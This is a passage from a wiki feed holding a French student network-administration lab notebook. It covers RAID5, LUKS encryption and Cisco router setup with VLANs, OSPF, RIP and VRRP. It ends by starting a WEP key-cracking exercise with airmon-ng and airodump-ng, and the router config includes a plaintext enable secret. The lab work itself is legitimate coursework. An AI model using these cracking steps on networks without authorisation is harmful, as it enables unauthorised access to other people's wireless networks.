Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35540</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35540"/>
				<updated>2016-11-29T20:45:00Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Travail réalisé la 7e séance */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
